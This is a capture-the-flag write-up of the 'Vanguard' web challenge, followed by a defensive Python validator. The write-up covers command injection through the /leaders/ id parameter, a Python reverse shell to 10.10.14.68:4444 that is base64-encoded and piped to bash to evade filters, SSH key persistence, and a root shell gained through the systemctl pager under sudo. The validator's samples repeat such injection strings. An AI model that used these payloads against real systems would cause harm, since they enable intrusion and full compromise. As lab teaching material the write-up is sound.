2023 Business CTF: Vanguard

Challenge Information

Attribute    Details
Event        2023 Business CTF
Category     Full Pwn
Challenge    Vanguard
Difficulty   Not specified

Summary

Vanguard is a full pwn challenge that involves exploiting a vulnerable web application running Apache 2.4.55 with PHP 8.2.8. The challenge requires identifying and exploiting a file upload vulnerability, using directory traversal to access internal services, and finally leveraging command injection to achieve remote code execution.


Challenge Information and Initial Analysis

The target is a web application accessible at http://vanguard.htb, running Apache 2.4.55 with PHP 8.2.8.

Initial reconnaissance reveals several key URLs and endpoints:

  • http://vanguard.htb/uploads
  • http://vanguard.htb/uploads.php
  • http://vanguard.htb/upload.php
  • http://vanguard.htb/leaders/
  • http://vanguard.htb/system-info

The application uses libraries including wowjs and moment.js. The architecture includes a frontend on port 80 and a backend service running on port 8080.


Analysis

Infrastructure Architecture

The application is configured with Apache reverse proxying:

  • Frontend running on port 80 at vanguard.htb with document root /srv/http/vanguard
  • Backend service running on port 8080 with document root /srv/http/internal
  • Requests to /leaders/ are proxied to http://127.0.0.1:8080/
  • Requests to /uploads are proxied to http://127.0.0.1:8080/uploads/

Key Vulnerability

The backend service running on port 8080 is vulnerable to command injection through the /leaders/ endpoint. The application fails to properly sanitize user input passed to the id parameter.


Solution

Step 1: Identify the Vulnerability

Enumeration of the application reveals that the /leaders/ endpoint accepts user input and passes it unsanitized to the backend service. Testing with a simple curl request shows command injection is possible:

    curl 'http://vanguard.htb/leaders/' --data 'id=;`whoami`'

Step 2: Craft the Payload

Create a Python reverse shell payload. It will be sent base64-encoded so that the request body carries none of the characters a simple filter would reject; the address and port (10.10.14.68:4444) must match the listener set up in Step 3:

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.68",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Base64 encode the payload (the blob below decodes to the command above):

    cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjY4Iiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc=

Step 3: Execute the Payload

Set up a netcat listener on the attacker’s machine:

    nc -nvlp 4444

Send the exploit payload using curl:

    curl 'http://vanguard.htb/leaders/' --data 'id=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjY4Iiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc=|base64 -d|bash`'

Step 4: Establish Shell Access

Once a reverse shell is obtained as the puma user, upgrade it to a proper SSH session by adding your public key to that user's authorized_keys:

    mkdir /home/puma/.ssh
    echo "YOUR_PUBLIC_KEY" > /home/puma/.ssh/authorized_keys

Connect via SSH:

    ssh puma@vanguard.htb

Step 5: Privilege Escalation

Check sudo permissions:

    sudo -l

The output shows that the user can run /usr/bin/systemctl status trail.service as root without a password (NOPASSWD). This is the systemctl entry documented on GTFOBins:

    sudo /usr/bin/systemctl status trail.service
    !sh

This spawns a root shell because systemctl pipes its output through a pager (less by default) when run on a terminal, and the pager's ! command starts a shell with the root privileges sudo granted. The escape is a feature of the pager rather than a bug in systemctl, which is why any sudo rule on a pager-invoking command amounts to a root shell.


Key Takeaways

  • Command Injection: Always validate and sanitize user input before passing it to system commands; an id parameter should be checked against its expected shape (for example a decimal number) rather than filtered for known bad strings
  • Reverse Proxy Misconfiguration: Be aware of how reverse proxies forward requests and what endpoints they expose
  • Base64 Encoding: Encoding payloads helps bypass simple filtering mechanisms, so a filter that only looks for known command strings in request bodies is not a defence
  • Privilege Escalation via systemctl: The pager used by systemctl can be exploited to gain root access through GTFOBins techniques; sudo rules should not be granted on commands that invoke a pager or editor
  • Defense in Depth: Multiple layers of security are needed to prevent full system compromise
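As an added defender-side example (not part of the original writeup or the challenge's code), the following Python applies the validation the first takeaway recommends to the id parameter sent to /leaders/ and, when a value fails, reports which of the injection indicators seen in Steps 1 to 3 it carries, decoding an embedded base64 stage to recover the reverse shell callback address. The numeric shape of id, the constructed sample bodies and the 192.0.2.10 callback address are assumptions.

```python
import re
import base64
from urllib.parse import quote_plus, unquote_plus

# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")
# An "echo <base64> | base64 -d" stage, the shape of the writeup's curl payload.
B64_PIPE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d")
# Assumed expected shape of the backend's id parameter: a short decimal number.
VALID_ID = re.compile(r"[0-9]{1,10}")
# A Python socket connect() call inside a decoded stage, for the callback address.
CONNECT = re.compile(r'connect\(\("([\d.]+)",\s*(\d+)\)\)')

def decode_embedded_base64(value):
    """Return the decoded text of an 'echo <b64> | base64 -d' stage, or None."""
    m = B64_PIPE.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def inspect_body(body):
    """Classify one POST body to /leaders/: {"accepted", "reasons", "decoded"}."""
    params = dict(pair.partition("=")[::2] for pair in body.split("&") if pair)
    if "id" not in params:
        return {"accepted": False, "reasons": ["id parameter missing"], "decoded": None}
    value = unquote_plus(params["id"])  # same decoding PHP applies to form bodies
    if VALID_ID.fullmatch(value):
        return {"accepted": True, "reasons": [], "decoded": None}
    reasons = ["id is not a decimal number"]
    meta = "".join(sorted(set(SHELL_META.findall(value))))
    if meta:
        reasons.append("shell metacharacters: " + meta)
    decoded = decode_embedded_base64(value)
    if decoded is not None:
        reasons.append("base64 stage piped to a shell")
        hit = CONNECT.search(decoded)
        if hit:
            reasons.append(f"reverse shell callback to {hit.group(1)}:{hit.group(2)}")
    return {"accepted": False, "reasons": reasons, "decoded": decoded}

# Constructed sample bodies, not captured traffic; the callback address is documentation space.
CONSTRUCTED_STAGE = "python3 -c 'import socket;s=socket.socket();s.connect((\"192.0.2.10\",4444))'"
SAMPLE_BODIES = [
    "id=42",
    "id=;`whoami`",
    "id=" + quote_plus(";`echo " + base64.b64encode(CONSTRUCTED_STAGE.encode()).decode() + "|base64 -d|bash`"),
]
```

The third sample is URL-encoded the way a browser or curl --data-urlencode would send it; the second is raw, as in the writeup's curl command, and both are rejected for the same reason.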